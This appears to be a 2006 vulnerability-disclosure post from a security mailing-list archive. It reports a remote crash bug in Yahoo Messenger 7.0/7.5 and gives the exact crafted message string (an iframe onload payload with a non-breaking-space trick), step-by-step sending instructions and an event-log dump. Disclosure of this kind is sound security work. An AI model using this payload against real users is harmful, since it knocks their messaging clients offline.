SECURITYVULNS:DOC:13274
Jun 22, 2006 - 12:00 a.m.

Yahoo messenger bug


Hi,
I found a vulnerability in Yahoo Messenger: if you receive a private message with
this string "msg:---------------------------------------------iframe
onload=$InlineAction()>:)" (without quotes), Yahoo Messenger will crash with a runtime error.
Remote crash proof of concept:

  1. Open Messenger and log in.
  2. Open a third-party Yahoo chat client like YahElite version 269 through the Ymsgr protocol and
    log in with another account.
  3. Send a PM to the Messenger account with this string: "s: msg
    :---------------------------------------------iframe onload=$InlineAction()>:)" (without
    quotes)
  4. The remote user will crash closing down her messenger.
    Note: "msg :" this space must be created with alt+0160.
    s:(space)msg(alt+0160):---------------------------------------------iframe
    onload=$InlineAction()>:)

Tested in Yahoo Messenger 7.0/7.5.
I haven't tried it in Yahoo Messenger 8.0 Beta yet.
This is the event log:
0000: 41 70 70 6c 69 63 61 74 Applicat
0008: 69 6f 6e 20 46 61 69 6c ion Fail
0010: 75 72 65 20 20 79 70 61 ure ypa
0018: 67 65 72 2e 65 78 65 20 ger.exe
0020: 37 2e 30 2e 30 2e 34 33 7.0.0.43
0028: 38 20 69 6e 20 6a 73 63 8 in jsc
0030: 72 69 70 74 2e 64 6c 6c ript.dll
0038: 20 35 2e 36 2e 30 2e 38 5.6.0.8
0040: 38 33 31 20 61 74 20 6f 831 at o
0048: 66 66 73 65 74 20 30 30 ffset 00
0050: 30 31 36 38 39 31 0d 0a 016891…
I have installed the latest version of jscript.dll but the problem continues.
So do you have any information about this issue?
I discovered that it's a vulnerability exploited in the wild since February, but I don't
have enough information.
Regards

